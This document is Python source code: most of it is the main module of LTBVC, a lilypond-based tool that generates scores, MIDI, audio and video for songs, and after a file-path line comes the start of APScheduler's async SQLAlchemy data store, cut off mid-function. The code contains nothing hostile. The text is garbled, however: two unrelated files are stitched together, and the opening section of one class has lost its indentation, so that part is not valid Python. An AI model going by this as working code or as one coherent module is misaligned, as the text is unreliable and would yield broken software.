# template for the subtitle file name (parameter: target file name stem)
subtitleFileNameTemplate = "%s_subtitle.srt"
# template for the video file without audio (parameters: target file
# name stem and video file kind suffix)
silentVideoFileNameTemplate = "%s_noaudio%s.mp4"
# (lower-cased) file name used for disabling logging
lowerCasedNullLoggingFileName = "none"
#--------------------
#--------------------
def intersection (listA : List, listB : List) -> List:
    """Returns the list of elements of <listA> that also occur in
       <listB>, keeping the element order of <listA>"""

    # fixed: a list (not a one-shot generator) is returned so the result
    # may be traversed repeatedly, as the return annotation promises
    result = [element for element in listA if element in listB]
    return result
#--------------------
def makeMap (listA : List, listB : List) -> Map:
    """Returns a map from the elements in <listA> to <listB> assuming
       that list lengths are equal"""

    # pair each key with the value at the corresponding position
    return { key : listB[i] for i, key in enumerate(listA) }
#====================
class _CommandLineOptions:
    """This module handles command line options and checks them."""

    #--------------------

    @classmethod
    def checkArguments (cls,
                        argumentList : StringList):
        """Checks whether command line options given in <argumentList>
           are okay"""

        Logging.trace(">>")

        configurationFilePath = argumentList.configurationFilePath
        loggingFilePath = argumentList.loggingFilePath
        givenPhaseSet = set(deserializeToList(argumentList.phases, "/"))

        ValidityChecker.isReadableFile(configurationFilePath,
                                       "configurationFilePath")

        # the logging file must be writable unless logging is disabled
        # via the special file name "none" (case-insensitive)
        if loggingFilePath is not None:
            if loggingFilePath.lower() != lowerCasedNullLoggingFileName:
                ValidityChecker.isWritableFile(loggingFilePath,
                                               "loggingFilePath")

        # every requested phase must be one of the known phase names
        allowedPhaseSet = set(["all", "preprocess", "postprocess",
                               "extract", "score", "midi", "silentvideo",
                               "rawaudio", "refinedaudio", "mix",
                               "finalvideo"])
        Logging.trace("--: given phase set %r, allowed phase set %r",
                      givenPhaseSet, allowedPhaseSet)
        ValidityChecker.isValid(givenPhaseSet.issubset(allowedPhaseSet),
                                "bad phases - %s"
                                % str(list(givenPhaseSet))[1:-1])

        Logging.trace("<<")

    #--------------------

    @classmethod
    def read (cls):
        """Reads commandline options and sets variables appropriately;
           returns tuple of variables read"""

        Logging.trace(">>")

        programDescription = ("Generates lilypond files and target files"
                              + " for single voices, a complete score,"
                              + " a midi file and videos based on a"
                              + " configuration file")
        p = argparse.ArgumentParser(description=programDescription)

        p.add_argument("-k", action="store_true", dest="keepFiles",
                       help="tells to keep intermediate files")
        p.add_argument("configurationFilePath",
                       help="name of configuration file for song")
        p.add_argument("-l", "--loggingFilePath")
        p.add_argument("--phases",
                       required=True,
                       help=("slash-separated list of phase names to be"
                             + " executed; (for preprocessing) tells whether"
                             + " a voice extract, a full score"
                             + " a video or a midi should be produced;"
                             + " (for postprocessing) tells whether the"
                             + " single audio tracks, the audio mixdown"
                             + " or the final video shall be produced"))
        p.add_argument("--voices",
                       default="",
                       help=("slash-separated list of voice names to be"
                             + " processed (optional, default is all voices)"))

        argumentList = p.parse_args()

        # an empty --voices option selects all voices
        if argumentList.voices == "":
            selectedVoiceNameSet = set()
        else:
            selectedVoiceNameSet = \
                set(deserializeToList(argumentList.voices,"/"))

        processingPhaseSet = set(deserializeToList(argumentList.phases, "/"))
        intermediateFilesAreKept = argumentList.keepFiles
        result = (intermediateFilesAreKept, processingPhaseSet,
                  selectedVoiceNameSet, argumentList)

        Logging.trace("<<: intermediateFilesAreKept = %r,"
                      + " processingPhaseSet = %r,"
                      + " selectedVoiceNameSet = %r,"
                      + " arguments = %r",
                      intermediateFilesAreKept, processingPhaseSet,
                      selectedVoiceNameSet, argumentList)
        return result
#====================
class _LilypondProcessor:
"""Handles generation of extracts, score, midi file and silent
video."""
_configData = None
_selectedVoiceNameSet = set()
_lilypondCommand = None
_midiFileNameTemplate = "%s-std.mid"
_pathSeparator = OperatingSystem.pathSeparator
#--------------------
# LOCAL FEATURES
#--------------------
@classmethod
def _adaptTempFileName (cls,
processingPhase : String,
voiceNameList : StringList):
"""Constructs a temporary lilypond file name from configuration data
and settings <processingPhase> and <voiceNameList>"""
Logging.trace(">>: phase = %r, voices = %r",
processingPhase, voiceNameList)
template = cls._configData.tempLilypondFilePath
if processingPhase == "extract":
# assume there is only one voice in voice list
voiceName = voiceNameList[0]
template = template.replace("${voiceName}", voiceName)
else:
# strip off the voice name placeholder and any separator
# characters
regexp = re.compile(r"[\(\[_\- ]*\$\{voiceName\}[\)\]_\- ]*")
template = regexp.sub("", template)
result = template.replace("${phase}", processingPhase)
Logging.trace("<<: %r", result)
return result
#--------------------
@classmethod
def _calculateMidiMapsFromConfiguration (cls) -> Tuple:
"""Collects data from configuration file and returns mappings from
voice name to midi instrument, midi volume and midi pan
position"""
Logging.trace(">>")
voiceNameToVoiceDataMap = cls._configData.voiceNameToVoiceDataMap
voiceNameToMidiInstrumentMap = {}
voiceNameToMidiVolumeMap = {}
voiceNameToMidiPanMap = {}
for _, voiceName in enumerate(cls._configData.voiceNameList):
voiceDescriptor = voiceNameToVoiceDataMap[voiceName]
Logging.trace("--: %r", voiceDescriptor)
midiInstrument = voiceDescriptor.midiInstrument
midiVolume = voiceDescriptor.midiVolume
panPosition = voiceDescriptor.panPosition
midiInstrumentBank, midiInstrument = \
cls._stringToMidiInstrument(midiInstrument)
panPosition = cls._stringToMidiPanPosition(panPosition)
voiceNameToMidiInstrumentMap[voiceName] = midiInstrument
voiceNameToMidiVolumeMap[voiceName] = midiVolume
voiceNameToMidiPanMap[voiceName] = panPosition
result = (voiceNameToMidiInstrumentMap,
voiceNameToMidiVolumeMap,
voiceNameToMidiPanMap)
Logging.trace("<<: %r", result)
return result
#--------------------
@classmethod
def _calculateTrackToSettingsMap (cls) -> StringMap:
    """Collects data from configuration file for all the settings
       of each track and returns map from track name to midi
       channel, volume, pan position and reverb level"""
    Logging.trace(">>")

    result = {}
    voiceNameToVoiceDataMap = cls._configData.voiceNameToVoiceDataMap

    # the loop index was unused, hence plain iteration instead of
    # enumerate
    for voiceName in cls._configData.voiceNameList:
        voiceDescriptor = voiceNameToVoiceDataMap[voiceName]
        Logging.trace("--: %r", voiceDescriptor)

        midiChannel = voiceDescriptor.midiChannel
        midiInstrument = voiceDescriptor.midiInstrument
        midiVolume = voiceDescriptor.midiVolume
        panPosition = voiceDescriptor.panPosition
        reverbLevel = voiceDescriptor.reverbLevel

        # convert the textual configuration values into midi numbers
        panPosition = cls._stringToMidiPanPosition(panPosition)
        midiInstrumentBank, midiInstrument = \
            cls._stringToMidiInstrument(midiInstrument)
        # scale reverb level to the midi controller range [0, 127]
        reverbLevel = int(127 * reverbLevel)

        trackSettingsEntry = \
            TrackSettings(voiceName, midiChannel, midiInstrumentBank,
                          midiInstrument, midiVolume, panPosition,
                          reverbLevel)
        result[voiceName] = trackSettingsEntry

    Logging.trace("<<: %r", result)
    return result
#--------------------
@classmethod
def _findOverriddenVoiceSets (cls,
                              voiceNameSet : StringSet) -> StringSet:
    """Calculates set of overridden voices and remaining set
       of selected voices"""

    overriddenVoiceNameSet = \
        set(cls._configData.voiceNameToOverrideFileNameMap.keys())
    Logging.trace(">>: overriddenVoiceSet = %r, voiceSet = %r",
                  overriddenVoiceNameSet, voiceNameSet)

    # only voices that are both selected and overridden count as
    # overridden; the rest remain for normal processing
    overriddenVoiceNameSet = set(voiceNameSet) & overriddenVoiceNameSet
    remainingVoiceNameSet = voiceNameSet - overriddenVoiceNameSet
    result = (overriddenVoiceNameSet, remainingVoiceNameSet)

    Logging.trace("<<: result = %r", result)
    return result
#--------------------
@classmethod
def _makePdf (cls,
              processingPhase : String,
              targetFileNamePrefix : String,
              voiceNameList : StringList):
    """Processes lilypond file and generates extract or score PDF
       file."""
    Logging.trace(">>: targetFilePrefix = %r, voiceNameList=%r",
                  targetFileNamePrefix, voiceNameList)

    tempLilypondFilePath = cls._adaptTempFileName(processingPhase,
                                                  voiceNameList)
    configData = cls._configData

    # generate a temporary lilypond file for the given phase and
    # voices ...
    lilypondFile = LilypondFile(tempLilypondFilePath)
    lilypondFile.generate(configData.includeFilePath,
                          configData.lilypondVersion,
                          processingPhase, voiceNameList,
                          configData.title,
                          configData.songComposerText,
                          configData.voiceNameToChordsMap,
                          configData.voiceNameToLyricsMap,
                          configData.voiceNameToScoreNameMap,
                          configData.measureToTempoMap,
                          configData.phaseAndVoiceNameToClefMap,
                          configData.phaseAndVoiceNameToStaffListMap)

    # ... run lilypond on it ...
    cls._processLilypond(tempLilypondFilePath, targetFileNamePrefix)

    # ... and move the resulting PDF to the target directory, removing
    # the temp file (unless intermediate files are kept)
    OperatingSystem.moveFile(targetFileNamePrefix + ".pdf",
                             configData.targetDirectoryPath)
    OperatingSystem.removeFile(tempLilypondFilePath,
                               configData.intermediateFilesAreKept)

    Logging.trace("<<")
#--------------------
@classmethod
def _processLilypond (cls,
                      lilypondFilePath : String,
                      targetFileNamePrefix : String):
    """Runs lilypond on <lilypondFilePath> and stores the result in a
       file named with <targetFileNamePrefix>."""
    Logging.trace(">>: lilyFile = %r, targetFileNamePrefix=%r",
                  lilypondFilePath, targetFileNamePrefix)

    OperatingSystem.showMessageOnConsole("== processing "
                                         + targetFileNamePrefix)

    # lilypond command with explicit output prefix
    commandTuple = (cls._lilypondCommand,
                    "--output", targetFileNamePrefix,
                    lilypondFilePath)
    OperatingSystem.executeCommand(commandTuple, True)

    Logging.trace("<<")
#--------------------
@classmethod
def _stringToMidiInstrument(cls,
                            st : String) -> Tuple:
    """Converts <st> to midi instrument bank plus instrument based on
       separator ':' (if any)"""
    Logging.trace(">>: %r", st)

    if ':' in st:
        # "bank:instrument" form
        bankString, instrumentString = st.split(":")
        midiInstrumentBank = int(bankString)
        midiInstrument = int(instrumentString)
    else:
        # plain instrument number, bank defaults to 0
        midiInstrumentBank = 0
        midiInstrument = int(st)

    result = (midiInstrumentBank, midiInstrument)
    Logging.trace("<<: %r", result)
    return result
#--------------------
@classmethod
def _stringToMidiPanPosition (cls,
                              st : String) -> Natural:
    """Returns pan position in range [0, 127] for given <st>"""
    Logging.trace(">>: %r", st)

    if st == "C":
        # center position
        result = 64
    else:
        # a numeric factor followed by a direction suffix "L" or "R"
        directionSuffix = st[-1]
        offset = int(float(st[:-1]) * 63)
        Logging.trace("--: panPosition = %r, pan = %d, suffix = %r",
                      st, offset, directionSuffix)
        result = iif(directionSuffix == "L", 63 - offset, 65 + offset)

    Logging.trace("<<: %r", result)
    return result
#--------------------
# EXPORTED FEATURES
#--------------------
@classmethod
def processExtract (cls):
    """Generates voice extracts as PDF and move them to local
       target directory."""
    Logging.trace(">>")

    relevantVoiceNameSet = (cls._selectedVoiceNameSet
                            & cls._configData.extractVoiceNameSet)

    for voiceName in relevantVoiceNameSet:
        Logging.trace("--: processing %s", voiceName)
        targetFileNamePrefix = ("%s-%s"
                                % (cls._configData.fileNamePrefix,
                                   voiceName))
        # each extract contains exactly one voice
        cls._makePdf("extract", targetFileNamePrefix, [ voiceName ])

    Logging.trace("<<")
#--------------------
@classmethod
def processFinalVideo (cls):
    """Generates final videos from silent video, audio tracks and
       subtitle files."""
    Logging.trace(">>")

    configData = cls._configData
    # temporary files used while combining video, audio and subtitles
    intermediateFileDirectoryPath = \
        configData.intermediateFileDirectoryPath
    tempSubtitleFilePath = (intermediateFileDirectoryPath
                            + "/tempSubtitle.srt")
    tempMp4FilePath = (intermediateFileDirectoryPath
                       + "/tempVideoWithSubtitles.mp4")

    # --- shift subtitles ---
    subtitleFilePath = "%s/%s" % (configData.targetDirectoryPath,
                                  (subtitleFileNameTemplate
                                   % configData.fileNamePrefix))
    VideoAudioCombiner.shiftSubtitleFile(subtitleFilePath,
                                         tempSubtitleFilePath,
                                         configData.shiftOffset)

    for _, videoFileKind in configData.videoFileKindMap.items():
        silentMp4FilePath = (("%s/" + silentVideoFileNameTemplate)
                             % (configData.targetDirectoryPath,
                                configData.fileNamePrefix,
                                videoFileKind.fileNameSuffix))
        videoTargetName = videoFileKind.target

        if videoTargetName not in configData.videoTargetMap:
            # skip file kinds referring to an undefined video target
            Logging.trace("--: unknown video target %s for file kind %s",
                          videoTargetName, videoFileKind.name)
        else:
            videoTarget = configData.videoTargetMap[videoTargetName]

            if not videoTarget.subtitlesAreHardcoded:
                # subtitles are handed over as a separate file
                videoFilePath = silentMp4FilePath
                effectiveSubtitleFilePath = tempSubtitleFilePath
            else:
                # subtitles are burnt into the video frames up front
                videoFilePath = tempMp4FilePath
                effectiveSubtitleFilePath = ""
                VideoAudioCombiner.insertHardSubtitles( \
                                        silentMp4FilePath,
                                        tempSubtitleFilePath,
                                        videoFilePath,
                                        configData.shiftOffset,
                                        videoTarget.subtitleColor,
                                        videoTarget.subtitleFontSize,
                                        videoTarget.ffmpegPresetName)

            targetDirectoryPath = videoFileKind.directoryPath
            ValidityChecker.isDirectory(targetDirectoryPath,
                                        "video target directory")
            targetVideoFilePath = ("%s/%s%s-%s.mp4"
                                   % (targetDirectoryPath,
                                      configData.targetFileNamePrefix,
                                      configData.fileNamePrefix,
                                      videoTarget.name))
            trackDataList = \
                AudioTrackManager.constructSettingsForAudioTracks(configData)

            # combine video, audio tracks and (possibly soft) subtitles
            VideoAudioCombiner.combine(videoFileKind.voiceNameList,
                                       trackDataList, videoFilePath,
                                       targetVideoFilePath,
                                       effectiveSubtitleFilePath)

            # add metadata tags to the resulting video file
            mediaType = "TV Show"
            VideoAudioCombiner.tagVideoFile(targetVideoFilePath,
                                            configData.albumName,
                                            configData.artistName,
                                            configData.albumArtFilePath,
                                            configData.title,
                                            mediaType,
                                            configData.songYear)

    # clean up temporary files (unless intermediate files are kept)
    intermediateFilesAreKept = configData.intermediateFilesAreKept
    OperatingSystem.removeFile(tempSubtitleFilePath,
                               intermediateFilesAreKept)
    OperatingSystem.removeFile(tempMp4FilePath,
                               intermediateFilesAreKept)

    Logging.trace("<<")
#--------------------
@classmethod
def processMidi (cls):
    """Generates midi file from lilypond file."""
    Logging.trace(">>")

    configData = cls._configData
    intermediateFilesAreKept = configData.intermediateFilesAreKept
    tempLilypondFilePath = cls._adaptTempFileName("midi", [])
    lilypondFile = LilypondFile(tempLilypondFilePath)

    # apply per-voice midi instrument, volume and pan settings from
    # the configuration
    voiceNameToMidiInstrumentMap, \
    voiceNameToMidiVolumeMap, \
    voiceNameToMidiPanMap = cls._calculateMidiMapsFromConfiguration()
    lilypondFile.setMidiParameters(voiceNameToMidiInstrumentMap,
                                   voiceNameToMidiVolumeMap,
                                   voiceNameToMidiPanMap)
    lilypondFile.generate(configData.includeFilePath,
                          configData.lilypondVersion, "midi",
                          configData.midiVoiceNameList,
                          configData.title,
                          configData.songComposerText,
                          configData.voiceNameToChordsMap,
                          configData.voiceNameToLyricsMap,
                          configData.voiceNameToScoreNameMap,
                          configData.measureToTempoMap,
                          configData.phaseAndVoiceNameToClefMap,
                          configData.phaseAndVoiceNameToStaffListMap)

    # lilypond writes a raw midi file with a temporary prefix
    tempMidiFileNamePrefix = (configData.intermediateFileDirectoryPath
                              + cls._pathSeparator
                              + configData.fileNamePrefix + "-temp")
    tempMidiFileName = tempMidiFileNamePrefix + ".mid"
    targetMidiFileName = (cls._midiFileNameTemplate
                          % configData.fileNamePrefix)
    cls._processLilypond(tempLilypondFilePath, tempMidiFileNamePrefix)

    # postprocess MIDI file
    OperatingSystem.showMessageOnConsole("== adapting MIDI into "
                                         + targetMidiFileName)

    trackToSettingsMap = cls._calculateTrackToSettingsMap()
    midiTransformer = MidiTransformer(tempMidiFileName,
                                      intermediateFilesAreKept)
    midiTransformer.addMissingTrackNames()
    midiTransformer.humanizeTracks(configData.countInMeasureCount,
                                   configData.measureToHumanizationStyleNameMap)
    midiTransformer.positionInstruments(trackToSettingsMap)
    midiTransformer.addProcessingDateToTracks(trackToSettingsMap.keys())
    midiTransformer.save(targetMidiFileName)

    # move result to target directory and remove temporary files
    OperatingSystem.moveFile(targetMidiFileName,
                             configData.targetDirectoryPath)
    OperatingSystem.removeFile(tempMidiFileName,
                               intermediateFilesAreKept)
    OperatingSystem.removeFile(tempLilypondFilePath,
                               intermediateFilesAreKept)

    Logging.trace("<<")
#--------------------
@classmethod
def processMix (cls):
    """Mixdown audio tracks."""
    Logging.trace(">>")

    configData = cls._configData
    trackManager = AudioTrackManager(configData.tempAudioDirectoryPath)
    trackManager.mixdown(configData)

    Logging.trace("<<")
#--------------------
@classmethod
def processRawAudio (cls):
    """Generates unprocessed audio files from generated midi file."""
    Logging.trace(">>")

    configData = cls._configData
    midiFileName = cls._midiFileNameTemplate % configData.fileNamePrefix
    midiFilePath = configData.targetDirectoryPath + "/" + midiFileName
    relevantVoiceNameSet = (cls._selectedVoiceNameSet
                            & configData.audioVoiceNameSet)
    trackManager = AudioTrackManager(configData.tempAudioDirectoryPath)

    # render one raw audio file per selected voice
    for voiceName in relevantVoiceNameSet:
        trackManager.generateRawAudio(midiFilePath, voiceName,
                                      configData.shiftOffset)

    Logging.trace("<<")
#--------------------
@classmethod
def processRefinedAudio (cls):
    """Generates refined audio files from raw audio file."""
    Logging.trace(">>")

    configData = cls._configData
    trackManager = AudioTrackManager(configData.tempAudioDirectoryPath)
    relevantVoiceNameSet = (cls._selectedVoiceNameSet
                            & configData.audioVoiceNameSet)
    overriddenVoiceNameSet, voiceNameSet = \
        cls._findOverriddenVoiceSets(relevantVoiceNameSet)

    # plain voices are refined by sound processing
    for voiceName in voiceNameSet:
        Logging.trace("--: processing voice %s", voiceName)
        descriptor = configData.voiceNameToVoiceDataMap[voiceName]
        trackManager.generateRefinedAudio(voiceName,
                                          descriptor.soundVariant,
                                          descriptor.reverbLevel)

    # overridden voices are copied from their external override file
    for voiceName in overriddenVoiceNameSet:
        overrideFilePath = \
            configData.voiceNameToOverrideFileNameMap[voiceName]
        trackManager.copyOverrideFile(overrideFilePath, voiceName,
                                      configData.shiftOffset)

    Logging.trace("<<")
#--------------------
@classmethod
def processScore (cls):
    """Generates score as PDF and moves them to local target
       directory."""
    Logging.trace(">>")

    scoreFileNamePrefix = cls._configData.fileNamePrefix + "_score"
    cls._makePdf("score", scoreFileNamePrefix,
                 cls._configData.scoreVoiceNameList)

    Logging.trace("<<")
#--------------------
@classmethod
def processSilentVideo (cls):
    """Generates video without audio from lilypond file."""
    Logging.trace(">>")

    mmPerInch = 25.4
    configData = cls._configData
    intermediateFilesAreKept = configData.intermediateFilesAreKept
    intermediateFileDirectoryPath = \
        configData.intermediateFileDirectoryPath
    targetDirectoryPath = configData.targetDirectoryPath
    targetSubtitleFileName = (targetDirectoryPath
                              + cls._pathSeparator
                              + (subtitleFileNameTemplate
                                 % configData.fileNamePrefix))
    tempLilypondFilePath = cls._adaptTempFileName("silentvideo", [])

    # one silent video is produced per configured video file kind
    for _, videoFileKind in configData.videoFileKindMap.items():
        message = ("== generating silent video for %s"
                   % videoFileKind.name)
        OperatingSystem.showMessageOnConsole(message)

        videoTargetName = videoFileKind.target

        if videoTargetName not in configData.videoTargetMap:
            # skip file kinds that refer to an undefined video target
            Logging.trace("--: unknown video target %s for file kind %s",
                          videoTargetName, videoFileKind.name)
        else:
            videoTarget = configData.videoTargetMap[videoTargetName]
            effectiveVideoResolution = (videoTarget.resolution
                                        * videoTarget.scalingFactor)
            # convert page geometry via dots-per-inch into millimetres
            # (assumes width/height are pixel counts — TODO confirm)
            factor = mmPerInch / videoTarget.resolution
            videoWidth = videoTarget.width * factor
            videoHeight = videoTarget.height * factor
            videoLineWidth = videoWidth - 2 * videoTarget.leftRightMargin

            lilypondFile = LilypondFile(tempLilypondFilePath)
            lilypondFile.setVideoParameters(videoTarget.name,
                                            effectiveVideoResolution,
                                            videoTarget.systemSize,
                                            videoTarget.topBottomMargin,
                                            videoWidth, videoHeight,
                                            videoLineWidth)
            lilypondFile.generate(configData.includeFilePath,
                                  configData.lilypondVersion, "video",
                                  videoFileKind.voiceNameList,
                                  configData.title,
                                  configData.songComposerText,
                                  configData.voiceNameToChordsMap,
                                  configData.voiceNameToLyricsMap,
                                  configData.voiceNameToScoreNameMap,
                                  configData.measureToTempoMap,
                                  configData.phaseAndVoiceNameToClefMap,
                                  configData.phaseAndVoiceNameToStaffListMap)

            targetMp4FileName = (targetDirectoryPath
                                 + cls._pathSeparator
                                 + (silentVideoFileNameTemplate
                                    % (configData.fileNamePrefix,
                                       videoFileKind.fileNameSuffix)))

            # render notation pages and assemble them into a silent mp4
            # plus a subtitle file
            videoGenerator = \
                LilypondPngVideoGenerator(tempLilypondFilePath,
                                          targetMp4FileName,
                                          targetSubtitleFileName,
                                          configData.measureToTempoMap,
                                          configData.countInMeasureCount,
                                          videoTarget.frameRate,
                                          videoTarget.scalingFactor,
                                          videoTarget.ffmpegPresetName,
                                          intermediateFileDirectoryPath,
                                          intermediateFilesAreKept)
            videoGenerator.process()
            videoGenerator.cleanup()

            ##OperatingSystem.moveFile(targetMp4FileName,
            ##                         configData.targetDirectoryPath)
            ##OperatingSystem.moveFile(targetSubtitleFileName,
            ##                         configData.targetDirectoryPath)

    OperatingSystem.removeFile(tempLilypondFilePath,
                               intermediateFilesAreKept)

    Logging.trace("<<")
#--------------------
#--------------------
def conditionalExecuteHandlerProc (processingPhase : String,
                                   processingPhaseSet : StringSet,
                                   isPreprocessing : Boolean,
                                   handlerProc : Callable):
    """Checks whether <processingPhase> occurs in <processingPhaseSet>, for
       being part of the group pre- or postprocessing (depending on
       <isPreprocessing>) and executes <handlerProc> when processing
       phase matches"""
    Logging.trace(">>: processingPhase = %r, processingPhaseSet = %r,"
                  + " isPreprocessing = %r",
                  processingPhase, processingPhaseSet, isPreprocessing)

    # a phase matches when selected directly, via "all" or via its
    # pre-/postprocessing group name
    groupName = iif(isPreprocessing, "preprocess", "postprocess")
    allowedPhaseSet = { "all", processingPhase, groupName }

    if not allowedPhaseSet.isdisjoint(processingPhaseSet):
        handlerProc()

    Logging.trace("<<")
#--------------------
def initialize ():
    """Initializes LTBVC program."""
    Logging.trace(">>")

    intermediateFilesAreKept, processingPhaseSet, \
    selectedVoiceNameSet, argumentList = _CommandLineOptions.read()
    _CommandLineOptions.checkArguments(argumentList)

    # set logging file path from command line (if available)
    loggingFilePath = argumentList.loggingFilePath

    if loggingFilePath is not None:
        if loggingFilePath.lower() != lowerCasedNullLoggingFileName:
            Logging.setFileName(loggingFilePath, False)
        else:
            # the special null name disables logging altogether
            Logging.setEnabled(False)

    configData = LTBVC_ConfigurationData()
    _LilypondProcessor._configData = configData
    _LilypondProcessor._selectedVoiceNameSet = selectedVoiceNameSet
    configurationFilePath = argumentList.configurationFilePath
    configurationFile = configData.readFile(configurationFilePath)

    if configurationFile is None:
        Logging.trace("--: cannot process configuration file %r",
                      configurationFilePath)
        isOkay = False
    else:
        isOkay = True

        if loggingFilePath is None:
            # get path from configuration file
            loggingFilePath = configData.get("loggingFilePath")

            if loggingFilePath is None:
                Logging.setEnabled(False)
            else:
                Logging.setFileName(loggingFilePath, True)

        configData.checkAndSetDerivedVariables(selectedVoiceNameSet)

        # override config file setting from command line option
        if intermediateFilesAreKept:
            SETATTR(configData, "intermediateFilesAreKept", True)

        # initialize all the submodules with configuration information
        _LilypondProcessor._lilypondCommand = configData.lilypondCommand
        LilypondPngVideoGenerator.initialize(configData.ffmpegCommand,
                                             configData.lilypondCommand)
        VideoAudioCombiner.initialize(configData.ffmpegCommand,
                                      configData.mp4boxCommand)
        AudioTrackManager.initialize(configData.aacCommandLine,
                                     configData.audioProcessorMap,
                                     configData.ffmpegCommand,
                                     configData.midiToWavRenderingCommandLine,
                                     configData.soundStyleNameToTextMap,
                                     configData.intermediateFilesAreKept,
                                     configData.intermediateFileDirectoryPath)
        MidiTransformer.initialize(configData.voiceNameToVariationFactorMap,
                                   configData.humanizationStyleNameToTextMap,
                                   configData.humanizedVoiceNameSet)

    Logging.trace("<<: isOkay = %r, processingPhaseSet = %r",
                  isOkay, processingPhaseSet)
    return isOkay, processingPhaseSet
#--------------------
def main ():
    """Main program for LTBVC."""
    Logging.initialize()
    Logging.setLevel(Logging.Level_verbose)
    Logging.setTracingWithTime(True, 2)
    Logging.trace(">>")

    isOkay, processingPhaseSet = initialize()

    if isOkay:
        Logging.trace("--: processingPhaseSet = %r", processingPhaseSet)

        # triples of phase name, is-preprocessing flag and handler, in
        # processing order
        actionList = \
            (("extract",      True,  _LilypondProcessor.processExtract),
             ("score",        True,  _LilypondProcessor.processScore),
             ("midi",         True,  _LilypondProcessor.processMidi),
             ("silentvideo",  True,  _LilypondProcessor.processSilentVideo),
             ("rawaudio",     False, _LilypondProcessor.processRawAudio),
             ("refinedaudio", False, _LilypondProcessor.processRefinedAudio),
             ("mix",          False, _LilypondProcessor.processMix),
             ("finalvideo",   False, _LilypondProcessor.processFinalVideo))

        for action in actionList:
            phaseName, isPreprocessing, handlerProc = action
            conditionalExecuteHandlerProc(phaseName, processingPhaseSet,
                                          isPreprocessing, handlerProc)

    Logging.trace("<<")
#--------------------
# invoke the main program only when executed as a script (not on import)
if __name__ == "__main__":
    main()
/APScheduler-4.0.0a1.tar.gz/APScheduler-4.0.0a1/src/apscheduler/datastores/async_sqlalchemy.py | from __future__ import annotations
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Any, Iterable
from uuid import UUID
import anyio
import attrs
import sniffio
import tenacity
from sqlalchemy import and_, bindparam, or_, select
from sqlalchemy.engine import URL, Result
from sqlalchemy.exc import IntegrityError, InterfaceError
from sqlalchemy.ext.asyncio import create_async_engine
from sqlalchemy.ext.asyncio.engine import AsyncEngine
from sqlalchemy.sql.ddl import DropTable
from sqlalchemy.sql.elements import BindParameter
from .._enums import ConflictPolicy
from .._events import (
DataStoreEvent,
JobAcquired,
JobAdded,
JobDeserializationFailed,
ScheduleAdded,
ScheduleDeserializationFailed,
ScheduleRemoved,
ScheduleUpdated,
TaskAdded,
TaskRemoved,
TaskUpdated,
)
from .._exceptions import ConflictingIdError, SerializationError, TaskLookupError
from .._structures import Job, JobResult, Schedule, Task
from ..abc import AsyncEventBroker
from ..marshalling import callable_to_ref
from .base import BaseAsyncDataStore
from .sqlalchemy import _BaseSQLAlchemyDataStore
@attrs.define(eq=False)
class AsyncSQLAlchemyDataStore(_BaseSQLAlchemyDataStore, BaseAsyncDataStore):
"""
Uses a relational database to store data.
When started, this data store creates the appropriate tables on the given database
if they're not already present.
Operations are retried (in accordance to ``retry_settings``) when an operation
raises :exc:`sqlalchemy.OperationalError`.
This store has been tested to work with PostgreSQL (asyncpg driver) and MySQL
(asyncmy driver).
:param engine: an asynchronous SQLAlchemy engine
:param schema: a database schema name to use, if not the default
:param serializer: the serializer used to (de)serialize tasks, schedules and jobs
for storage
:param lock_expiration_delay: maximum amount of time (in seconds) that a scheduler
or worker can keep a lock on a schedule or task
:param retry_settings: Tenacity settings for retrying operations in case of a
database connectivity problem
:param start_from_scratch: erase all existing data during startup (useful for test
suites)
"""
engine: AsyncEngine
@classmethod
def from_url(cls, url: str | URL, **options) -> AsyncSQLAlchemyDataStore:
    """
    Create a new asynchronous SQLAlchemy data store.

    :param url: an SQLAlchemy URL to pass to :func:`~sqlalchemy.create_engine`
        (must use an async dialect like ``asyncpg`` or ``asyncmy``)
    :param options: keyword arguments to pass to the initializer of this class
    :return: the newly created data store
    """
    engine = create_async_engine(url, future=True)
    return cls(engine, **options)
def _retry(self) -> tenacity.AsyncRetrying:
    """Build the retry controller used around every database operation."""
    # asyncpg raises a plain OSError when it cannot connect, so retry on
    # that in addition to SQLAlchemy's InterfaceError
    retryable_exceptions = (InterfaceError, OSError)
    return tenacity.AsyncRetrying(
        stop=self.retry_settings.stop,
        wait=self.retry_settings.wait,
        retry=tenacity.retry_if_exception_type(retryable_exceptions),
        after=self._after_attempt,
        sleep=anyio.sleep,
        reraise=True,
    )
async def start(self, event_broker: AsyncEventBroker) -> None:
    """Start the data store: verify the async backend is asyncio,
    optionally wipe existing tables, create the schema and validate the
    stored schema version."""
    await super().start(event_broker)
    asynclib = sniffio.current_async_library() or "(unknown)"
    # NOTE(review): sniffio.current_async_library() raises
    # AsyncLibraryNotFoundError rather than returning a falsy value, so
    # the `or "(unknown)"` fallback looks unreachable — confirm
    if asynclib != "asyncio":
        raise RuntimeError(
            f"This data store requires asyncio; currently running: {asynclib}"
        )

    # Verify that the schema is in place
    async for attempt in self._retry():
        with attempt:
            async with self.engine.begin() as conn:
                if self.start_from_scratch:
                    # drop all known tables so the schema gets rebuilt
                    for table in self._metadata.sorted_tables:
                        await conn.execute(DropTable(table, if_exists=True))

                await conn.run_sync(self._metadata.create_all)
                query = select(self.t_metadata.c.schema_version)
                result = await conn.execute(query)
                version = result.scalar()
                if version is None:
                    # fresh database: record the current schema version
                    await conn.execute(
                        self.t_metadata.insert(values={"schema_version": 1})
                    )
                elif version > 1:
                    raise RuntimeError(
                        f"Unexpected schema version ({version}); "
                        f"only version 1 is supported by this version of "
                        f"APScheduler"
                    )
async def _deserialize_schedules(self, result: Result) -> list[Schedule]:
    """Deserialize rows from a schedules query.

    Rows that fail to unmarshal are skipped and reported via a
    ScheduleDeserializationFailed event instead of aborting the batch.
    """
    schedules: list[Schedule] = []
    for row in result:
        try:
            schedules.append(Schedule.unmarshal(self.serializer, row._asdict()))
        except SerializationError as exc:
            # row["id"] is the legacy Row access style (removed in
            # SQLAlchemy 2.0); attribute access works on 1.4 and 2.0
            await self._events.publish(
                ScheduleDeserializationFailed(schedule_id=row.id, exception=exc)
            )

    return schedules
async def _deserialize_jobs(self, result: Result) -> list[Job]:
    """Deserialize rows from a jobs query.

    Rows that fail to unmarshal are skipped and reported via a
    JobDeserializationFailed event instead of aborting the batch.
    """
    jobs: list[Job] = []
    for row in result:
        try:
            jobs.append(Job.unmarshal(self.serializer, row._asdict()))
        except SerializationError as exc:
            # row["id"] is the legacy Row access style (removed in
            # SQLAlchemy 2.0); attribute access works on 1.4 and 2.0
            await self._events.publish(
